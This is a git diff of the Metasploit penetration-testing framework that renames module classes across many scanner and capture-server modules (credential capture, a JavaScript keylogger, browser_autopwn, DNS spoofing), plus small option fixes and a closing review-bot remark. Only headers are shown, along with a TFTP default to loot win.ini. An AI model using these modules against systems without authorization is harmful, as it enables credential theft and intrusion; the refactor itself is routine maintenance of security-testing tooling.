b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 2facedd4f1..b7d336428a 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index 63dda3f8ab..3365467533 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index a23e6058ef..de3d1de097 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 644a178b89..3ec68ab891 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index dc1e190457..21b13ad5ce 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(69), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), - OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false']) + OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index fd8c131316..eaef1b8f21 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 29935dc352..3012f9401c 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index 07ec5c659d..8253611195 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index 5d2217308d..b5854af7e8 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 0f7496a036..99777f99e4 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 0cc62c9a60..753d309f50 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 5844222e6c..abcdea7cb2 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/tcp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vmauthd' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 28b6355385..abf0cd7665 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb 
@@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index d8bb09b6c5..39061893e6 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 3cd4b3563a..262d2304ee 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 8189a9b495..bc937bd926 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 45081e5019..0692fdb880 100644 
--- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index cd4cfb164c..e7929fed49 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 0225eddd6e..36fc06096a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index de4f89435f..72caad0ee1 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index 68e1922d5e..52f6bd5fd2 100644 
--- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb index 600db46d77..3e9cc9e5fd 100644 --- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 91ec122893..22f1f22341 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -8,7 +8,7 @@ require 'rex/proto/rfb' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vnc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index e16a345997..a787e463f7 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 0f4fe85d52..726c055267 100644 
--- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'fileutils' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::IAX2 diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 88914a5525..8a9f4a5c1f 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index 655bfbf00b..b2e2a25df1 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 05b76dd142..5a946de15a 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4ce2652f7..73639a55bb 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb 
@@ -9,7 +9,7 @@ require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 1871aa59d1..8b651e1935 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner' require 'metasploit/framework/login_scanner/winrm' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 7beaf89022..2705a1ce24 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 32912c464f..1ca3590286 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index 7d603eb953..6763597f09 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index d152584e06..cbce29df4f 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 35a4fcc4cc..0ff0e253b8 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/exploitation/js/detect' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 1c28beee94..a43d870673 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::BrowserAutopwn2 diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 970b8cda7f..004bf01aa2 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 667eca6a4a..8d01ea4a46 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 721835e278..82118512d3 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 8e8db5c2ab..5b68785373 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index aefe8fce9c..e6cf859bb2 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 9d775d940d..04d052845c 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb 
@@ -13,7 +13,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 843ef0580b..979f44a84a 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/mssql.rb b/modules/auxiliary/server/capture/mssql.rb index 99885df4af..4f660f1d78 100644 --- a/modules/auxiliary/server/capture/mssql.rb +++ b/modules/auxiliary/server/capture/mssql.rb @@ -12,7 +12,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index a11ff87366..aba21c66df 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f22877434f..92cd3a383e 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb index d9f11042d1..bafb8f0366 100644 --- a/modules/auxiliary/server/capture/postgresql.rb +++ b/modules/auxiliary/server/capture/postgresql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 8c08bf33d4..5c6954fe81 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 03dd3e2113..debf7c8653 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 1f3e23306a..100f800596 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::SMB::Server 
diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 12769c29cb..f44de779d7 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index d1cabac7e4..73b966de96 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -6,7 +6,7 @@ require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb index adf634969d..b6e6cb0121 100644 --- a/modules/auxiliary/server/capture/vnc.rb +++ b/modules/auxiliary/server/capture/vnc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index 1441bd48c9..edb64ec9e4 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 65aad4275c..d25ee16e46 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 1fda7a81a6..f4f2f3ca8f 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 88c9c5f125..695a346578 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary @log_console = false @log_database = false - if (datastore['LogConsole'].to_s.match(/^(t|y|1)/i)) + if datastore['LogConsole'] @log_console = true end - if (datastore['LogDatabase'].to_s.match(/^(t|y|1)/i)) + if datastore['LogDatabase'] @log_database = true end diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index c6bb913e8a..c47b1601e2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 285232a1fa..8110a187b5 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb 
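Review bot: The new `if datastore['LogConsole']` and `if datastore['LogDatabase']` tests in the `@@ -70,11 +70,11 @@` hunk are only correct if both options are registered as `OptBool`, so that the datastore hands back a real boolean. The registration is outside the hunk; if either is still a string option, a value of "false" is truthy in Ruby and logging would be switched on regardless. Worth confirming the option types and recording the dependency next to the checks: `# relies on LogConsole/LogDatabase being OptBool`.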
